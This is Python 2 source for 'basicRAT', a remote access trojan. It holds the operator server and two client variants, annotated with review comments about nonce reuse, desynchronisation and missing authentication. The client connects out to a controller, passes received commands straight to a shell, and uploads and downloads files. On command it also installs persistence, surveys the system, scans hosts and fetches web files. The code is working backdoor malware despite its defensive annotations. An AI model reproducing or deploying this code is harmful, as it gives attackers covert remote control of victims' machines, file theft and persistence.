def send(self, prompt, cmd, action):
    """Forward one operator prompt to the connected client and handle the reply.

    `prompt` is the raw operator line; `cmd` is its first word and `action`
    the remainder (the caller that splits it is not visible here).  Nothing is
    returned; results and errors are printed.

    Review notes (reading this block defensively):
      * Every branch below runs *after* the prompt has already gone to the
        client, so the early `return`s on the file-transfer error paths leave
        the client waiting for a transfer that never starts -- the two ends
        are out of step from then on.
      * No authentication of the remote peer is visible in this block; the
        session's security rests entirely on the key material in self.GCM.
    """
    if not self.alive:
        print 'Error: Client not connected.'
        return

    # send prompt to client; self.IV is handed to sendGCM and advanced once per
    # prompt.  NOTE(review): GCM nonce reuse breaks both confidentiality and
    # integrity, so the peer must advance its counter in lock-step -- confirm
    # how sendGCM/recvGCM derive the nonce from IV.
    crypto.sendGCM(self.conn, self.GCM, self.IV, prompt)
    # 1 s receive timeout for the reply; socket.timeout is not caught here
    self.conn.settimeout(1)
    self.IV += 1

    # kill client connection
    if cmd == 'kill':
        self.conn.close()

    # download a file (client -> server), one local file per whitespace token
    elif cmd == 'download':
        for fname in action.split():
            fname = fname.strip()
            # refuse to overwrite an existing local file.  NOTE(review): the
            # prompt was already sent, so returning here leaves the client
            # mid-transfer.
            if os.path.isfile(fname):
                print 'Error: File name already exists.'
                return
            filesock.recvfile(self.conn, self.GCM, fname)

    # send file (server -> client)
    elif cmd == 'upload':
        for fname in action.split():
            fname = fname.strip()
            # NOTE(review): same desync as above -- the client is already
            # expecting a file by the time this check fails.
            if not os.path.isfile(fname):
                print 'Error: File not found.'
                return
            filesock.sendfile(self.conn, self.GCM, self.IV, fname)

    # regenerate DH key.  NOTE(review): only self.dh_key is replaced; self.GCM
    # is not rebuilt in this block, so unless crypto.diffiehellman updates it
    # itself the cipher keeps using the old key.
    elif cmd == 'rekey':
        self.dh_key = crypto.diffiehellman(self.conn, server=True)

    # results of execute, persistence, scan, survey, unzip, or wget --
    # a single recvGCM call is assumed to carry the whole reply
    elif cmd in [ 'execute', 'persistence', 'scan', 'survey', 'unzip', 'wget' ]:
        print 'Running {}...'.format(cmd)
        recv_data = crypto.recvGCM(self.conn, self.GCM).rstrip()
        print recv_data
def main():
    """Server entry point: listen on the configured port, accept one client,
    agree a key with it and then run the operator prompt loop.

    The port comes from `get_parser()`; `COMMANDS`, `HELP_TEXT` and `BANNER`
    are module-level names not visible in this block.  Exits the process on a
    bind failure (status 1) or on the 'quit' command (status 0).

    Review notes:
      * The listener binds every interface and no allow-list or peer
        authentication is visible here, so the key agreement below is
        completed with whichever peer connects first.
      * Reads and writes are single unframed send()/recv() calls; a partial
        read hands a truncated ciphertext to AES_decrypt.
    """
    parser = get_parser()
    args = vars(parser.parse_args())
    port = args['port']

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    try:
        # listens on all interfaces; nothing in this block restricts who may connect
        s.bind(('0.0.0.0', port))
    except socket.error:
        print 'Error: Unable to start server, port {} in use?'.format(port)
        sys.exit(1)

    # print the banner one line at a time with a short delay
    for line in BANNER.split('\n'):
        time.sleep(0.05)
        print line

    print 'basicRAT server listening on port {}...'.format(port)

    s.listen(10)
    # single client: accept() is called once and the loop below never returns to it
    conn, addr = s.accept()

    # key agreement with the connected peer; no authentication step is visible here
    DHKEY = diffiehellman(conn, server=True)

    while True:
        prompt = raw_input('\n[{}] basicRAT> '.format(addr[0])).rstrip()

        # allow noop
        if not prompt:
            continue

        # separate prompt into command and action
        cmd, _, action = prompt.partition(' ')

        # ensure command is valid before sending
        if cmd not in COMMANDS:
            print 'Invalid command, type "help" to see a list of commands.'
            continue

        # display help text
        if cmd == 'help':
            print HELP_TEXT
            continue

        # send data to client.  NOTE(review): send() may transmit only part of
        # the buffer; sendall() is the usual choice for a whole message.
        conn.send(AES_encrypt(prompt, DHKEY))

        # stop server
        if cmd == 'quit':
            s.close()
            sys.exit(0)

        # results of command -- assumes the whole reply fits in, and arrives
        # within, a single 4096-byte read
        elif cmd == 'run':
            recv_data = conn.recv(4096)
            print AES_decrypt(recv_data, DHKEY).rstrip()

        # download a file, one per whitespace-separated token
        elif cmd == 'download':
            for fname in action.split():
                fname = fname.strip()
                recvfile(conn, fname, DHKEY)

        # send file
        elif cmd == 'upload':
            for fname in action.split():
                fname = fname.strip()
                sendfile(conn, fname, DHKEY)

        # regenerate DH key (both sides must do this in the same turn)
        elif cmd == 'rekey':
            DHKEY = diffiehellman(conn, server=True)

        # results of scan, survey, persistence, unzip, or wget -- single
        # 1024-byte read, same partial-read caveat as above
        elif cmd in ['scan', 'survey', 'persistence', 'unzip', 'wget']:
            print 'Running {}...'.format(cmd)
            recv_data = conn.recv(1024)
            print AES_decrypt(recv_data, DHKEY)
def main():
    """Client entry point: connect to HOST:PORT, agree a key, then execute
    commands received from the server until 'quit'.

    `HOST`, `PORT` and `PLAT_TYPE` are module-level names not visible here;
    `crypto`, `filesock`, `persistence`, `toolkit`, `survey` and `scan` are
    project modules whose internals this block does not show.

    Review notes (what a defender would look for):
      * Observable behaviour is one long-lived outbound TCP connection plus
        shell children spawned by this process for each 'run' command.
      * The received text is passed verbatim to a shell, and no peer
        authentication is visible in this block -- whoever completes the
        handshake controls this host.
    """
    s = socket.socket()
    s.connect((HOST, PORT))

    # key agreement with the server; no authentication step is visible here
    DHKEY = crypto.diffiehellman(s)

    while True:
        # single 1024-byte read: a longer or split message reaches AES_decrypt truncated
        data = s.recv(1024)
        data = crypto.AES_decrypt(data, DHKEY)

        # separate prompt into command and action
        cmd, _, action = data.partition(' ')

        # stop client
        if cmd == 'quit':
            s.close()
            sys.exit(0)

        # run command -- `action` goes to the shell unmodified
        elif cmd == 'run':
            results = subprocess.Popen(action, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            # NOTE(review): reading stdout to EOF before stderr can block if the
            # child fills the stderr pipe first (the subprocess docs recommend
            # communicate() for this reason)
            results = results.stdout.read() + results.stderr.read()
            s.sendall(crypto.AES_encrypt(results, DHKEY))

        # send file (this host -> server)
        elif cmd == 'download':
            for fname in action.split():
                fname = fname.strip()
                filesock.sendfile(s, fname, DHKEY)

        # receive file (server -> this host)
        elif cmd == 'upload':
            for fname in action.split():
                fname = fname.strip()
                filesock.recvfile(s, fname, DHKEY)

        # regenerate DH key
        elif cmd == 'rekey':
            DHKEY = crypto.diffiehellman(s)

        # apply persistence mechanism.  NOTE(review): the branches below use
        # send(), which may write only part of the buffer, whereas 'run' uses sendall()
        elif cmd == 'persistence':
            results = persistence.run(PLAT_TYPE)
            s.send(crypto.AES_encrypt(results, DHKEY))

        # download a file from the web
        elif cmd == 'wget':
            results = toolkit.wget(action)
            s.send(crypto.AES_encrypt(results, DHKEY))

        # unzip a file
        elif cmd == 'unzip':
            results = toolkit.unzip(action)
            s.send(crypto.AES_encrypt(results, DHKEY))

        # run system survey
        elif cmd == 'survey':
            results = survey.run(PLAT_TYPE)
            s.send(crypto.AES_encrypt(results, DHKEY))

        # run a scan
        elif cmd == 'scan':
            results = scan.single_host(action)
            s.send(crypto.AES_encrypt(results, DHKEY))
def main():
    """Client entry point (AES-GCM variant): connect to HOST:PORT, agree a key,
    wrap it in crypto.AES_GCM and execute commands from the server until 'kill'.

    `HOST`, `PORT` and `PLAT_TYPE` are module-level names not visible here.
    The commented-out lines are the older AES_encrypt/AES_decrypt calls this
    block replaced.

    Review notes:
      * The socket is non-blocking, so the loop spins on recvGCM while idle,
        and `IV` is advanced on every call -- including the empty ones.  GCM
        nonce reuse is fatal, so verify the peer derives the same nonce
        sequence from its own counter.
      * As in the other client, received text goes straight to a shell and no
        peer authentication is visible in this block.
    """
    s = socket.socket()
    s.connect((HOST, PORT))

    # key agreement, then a GCM cipher object built from the shared key
    dh_key = crypto.diffiehellman(s)
    GCM = crypto.AES_GCM(dh_key)
    IV = 0

    # non-blocking: the loop below busy-waits on recvGCM until data arrives
    s.setblocking(0)

    while True:
        #data = s.recv(1024)
        #data = crypto.AES_decrypt(data, dh_key)
        data = crypto.recvGCM(s, GCM)
        # NOTE(review): counter advances even when recvGCM returned nothing;
        # the server side appears to advance its counter only once per prompt
        IV += 1

        # presumably recvGCM yields an empty value when nothing is ready -- confirm
        if not data:
            continue

        # separate prompt into command and action
        cmd, _, action = data.partition(' ')

        # stop client
        if cmd == 'kill':
            s.close()
            sys.exit(0)

        # run command -- `action` goes to the shell unmodified
        elif cmd == 'execute':
            results = subprocess.Popen(action, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            # NOTE(review): reading stdout to EOF before stderr can block if the
            # child fills the stderr pipe first (see communicate() in the subprocess docs)
            results = results.stdout.read() + results.stderr.read()
            crypto.sendGCM(s, GCM, IV, results)

        # send file (this host -> server).  NOTE(review): sendfile is called
        # with 3 arguments here but with (conn, GCM, IV, fname) on the server
        # side elsewhere on this page; likewise recvfile below -- one side looks
        # mid-refactor, confirm filesock's signatures.
        elif cmd == 'download':
            for fname in action.split():
                fname = fname.strip()
                filesock.sendfile(s, GCM, fname)

        # receive file (server -> this host)
        elif cmd == 'upload':
            for fname in action.split():
                fname = fname.strip()
                filesock.recvfile(s, GCM, IV, fname)

        # regenerate DH key.  NOTE(review): GCM is not rebuilt from the new
        # dh_key here, so the cipher keeps the old key unless
        # crypto.diffiehellman updates it itself.
        elif cmd == 'rekey':
            dh_key = crypto.diffiehellman(s)

        # apply persistence mechanism
        elif cmd == 'persistence':
            results = persistence.run(PLAT_TYPE)
            crypto.sendGCM(s, GCM, IV, results)
            #s.send(crypto.AES_encrypt(results, dh_key))

        # download a file from the web
        elif cmd == 'wget':
            results = toolkit.wget(action)
            crypto.sendGCM(s, GCM, IV, results)
            #s.send(crypto.AES_encrypt(results, dh_key))

        # unzip a file
        elif cmd == 'unzip':
            results = toolkit.unzip(action)
            crypto.sendGCM(s, GCM, IV, results)
            #s.send(crypto.AES_encrypt(results, dh_key))

        # run system survey
        elif cmd == 'survey':
            results = survey.run(PLAT_TYPE)
            crypto.sendGCM(s, GCM, IV, results)
            #s.send(crypto.AES_encrypt(results, dh_key))

        # run a scan
        elif cmd == 'scan':
            results = scan.single_host(action)
            crypto.sendGCM(s, GCM, IV, results)